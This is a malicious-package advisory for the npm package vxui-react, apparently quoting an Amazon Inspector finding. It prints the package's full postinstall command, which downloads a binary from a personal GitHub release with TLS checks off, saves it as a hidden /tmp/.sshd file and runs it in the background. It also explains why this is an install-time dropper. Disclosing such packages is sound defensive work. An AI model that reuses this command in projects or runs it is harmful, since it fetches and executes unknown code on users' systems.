—

MAL-2026-4793

Malicious code in vxui-react (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (bde616ebc21909bfa386bf8e49438da710f48b62ae3127f2a7259c71557a4242) package.json declares a postinstall script that runs `curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &`. On every `npm install vxui-react`, this fetches an opaque binary from a personal GitHub user (`parikhpreyash4`) unrelated to the package's publisher, with TLS verification explicitly disabled (`-k`), errors suppressed, the file staged to a hidden path masquerading as the SSH daemon (`/tmp/.sshd`), made executable, and launched detached in the background. The package advertises itself as a React UI component library; no legitimate purpose for this exists. The fetched URL is mutable (`releases/latest`), unsigned, and unverified. This is a classic install-time remote code execution dropper.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / vxui-react

No fixed version published yet for vxui-react (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/vxui-react/v/1.3.2 [PACKAGE]